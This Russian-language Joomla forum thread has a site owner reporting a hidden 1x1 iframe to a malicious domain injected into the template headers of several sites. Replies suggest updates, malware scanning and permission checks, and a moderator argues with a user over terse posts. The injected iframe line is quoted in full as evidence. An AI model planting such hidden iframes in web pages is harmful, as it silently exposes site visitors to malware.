Подозрительный фрейм на сайте в Joomla 3 - Безопасность сайтов на Joomla

Всем привет решил сеня проверить свою сборку Joomla 3 у меня порядка 5 сайтов на ней. Зашел добавить счетчик и нашел вот такой код в index.php

<iframe src="http://googletraids.ml/46b4 " width="1" height="1" frameborder="0"></iframe>

Данный код находился в шапке сайта.
Так как я делал с 0 шаблон для сеа точно помню то что данный код я не добавлял. Шаблон собирал на примере Jblank.
Решил проверить все свои сайты и нашел там данный фрейм у всех сайтов.  Все они лежат на одном хосте. Посмотрел дату изменения файла. Все нормально изменялся мною последний раз. Зашел в стандартные шаблоны, которые были установлены опять же нашел данную строку.
Самое интересное что касперский блочит эту ссылку и говорит что там вирус.
Как решить трабл чтобы избежать последующих измений в коде со стороны?
Данные код я уже выпелил из сайтов.
На этом же хосте лежит  еще парочку сайтов на Joomla тока 2.5 но данного кода в них я не нашел

так же проверил свои резервные копии сайта данного фрейма там тоже не обнаружил.

Решить можно обновлением всех своих компонентов-плагинов и проверкой сайта айболитом. Так же проверить права на папки. Вот статья в помощь.

Как вариант- взломали Joomla 2.5, а код вируса прописали на нужном сайте, что находиться на одно аккаунте.
п.с.
ВОт и проверим, модер только ко мне придирается, что я пишу про айболит

Решить можно обновлением всех своих компонентов-плагинов и проверкой сайта айболитом.

Как вариант- взломали Joomla 2.5, а код вируса прописали на нужном сайте, что находиться на одно аккаунте.
п.с.
ВОт и проверим, модер только ко мне придирается, что я пишу про айболит

Ну не знаю.  Джмумла была 3.1
2.5 лежит в другой папке она никак не связана с с другими.
Обновил Joomla и модули, убрал фреймы  проверил сайт на вирусы через онлайн антивирус др веба.  Щас займусь папками и айболитом.

Кстати а айболит норм? стоит его вообще юзать или лучше плагины поставить типа админ тулса?

Кстати а айболит норм? стоит его вообще юзать или лучше плагины поставить типа админ тулса?

Посмотрите статью - сравнение сканеров.

Движок чистый! Это у вас проблемы.

Ну не знаю.  Джмумла была 3.1
2.5 лежит в другой папке она никак не связана с с другими.

open_basedir прописана в конфиге для домена/папки ? Владелец разные ?

Как вариант- взломали Joomla 2.5, а код вируса прописали на нужном сайте, что находиться на одно аккаунте.
п.с.
ВОт и проверим, модер только ко мне придирается, что я пишу про айболит

Вроде взрослый человек, не один год друг друга знаем, если не понимаете о чем речь объясню как вы и хотели в открытую, может поймете так, не придирался ни к кому просто попросил вас, о том что надо писать информативные посты в помощь задающему вопрос, а не вставлять одни и те же бессмысленные отписки, уж лучше мимо проходите, мне все равно что вы пишете в постах но когда надо помогать не стоит писать одно и тоже вот Ваши посты только последние

а сканер айболит уже советовали применить для поиска шелла ?

Откуда Joomla скачанная? Проверьте сканером айболит файлы сайта

Если Joomla до 1.5.26, и до 2.5.28, то все содержат уязвимость.
Сканер айболит в помощь

Не понял про это действие- Сканер айболит в помощь

Joomla до .5.28 содержит уязвимость.Обновить пакетом Joomla 2.5-2.5.28
Сканер айболит в помощь

Сканер айболит в помощь. Версии Joomla до 2.5.28 содержат уязвимость безопасности, обновите Joomla и все установленные сторонние расширения

Сравнивать файлы указанные айболитом, с файлами из архива Joomla/расширений

ссылка на сайт?
сканер айболит в помощь.гугл обычно реагирует на вредоносный JavaScript

Joomla до .5.28 содержит уязвимость.Обновить пакетом Joomla 2.5-2.5.28
Сканер айболит в помощь

и прошлогодние

сканер айболит в помощь http://joomlaforum.ru/index.php/topic,195980.0.html

Есть раздел на форуме Безопасность .
Искать начни сначала с помощью сканера айболит

и поверьте мне это только малая часть ваших постов ни о чем

draff вы или помогайте развернутыми ответами или мимо проходите как многие поступают когда нету время, не набивайте себе цену не надо в топиках просто отмечаться что бы показать свою подпись, вам посоветовал вставить в подпись то что вы пишите, потому что зачем посты набивать с одним смысловым содержанием ведь можно просто отмечаться в топиках просто с подписью без ответов на вопросы.
Берите пример хотя бы с колег таких как SeBun wishlight winstrool они или отвечают развернуто или направляют в нужном направлении, или мимо проходят если время нету.

Берите пример хотя бы с колег таких как SeBun wishlight winstrool они или отвечают развернуто или направляют в нужном направлении, или мимо проходят если время нету.

Офигеть.Вот и проверил.Значит SeBun можно свободно писать про айболит, см. пост выше моего, а я набиваю себе цену и т.д. А то что в личке мне написано

приветствую
вы в подпись вставьте айболита себе, а то сколько тем по существу ни чего а "сканер айболит в помощь" только у вас и wishlight

И что можно еще посоветовать человеку, который задает вопрос, из которого видно, что он не хочет перечитывать всю информацию в разделе Безопасность.

И что можно еще посоветовать человеку, который задает вопрос, из которого видно, что он не хочет перечитывать всю информацию в разделе Безопасность.

мимо пройти чем просто отметиться

Решить можно обновлением всех своих компонентов-плагинов и проверкой сайта айболитом. Так же проверить права на папки. Вот статья в помощь.

читаем пост внимательно, там не просто отметка, и после этого поста человек еще пишет

холиварить не будем, моя просьба остается просьбой, а ваше право выбора что писать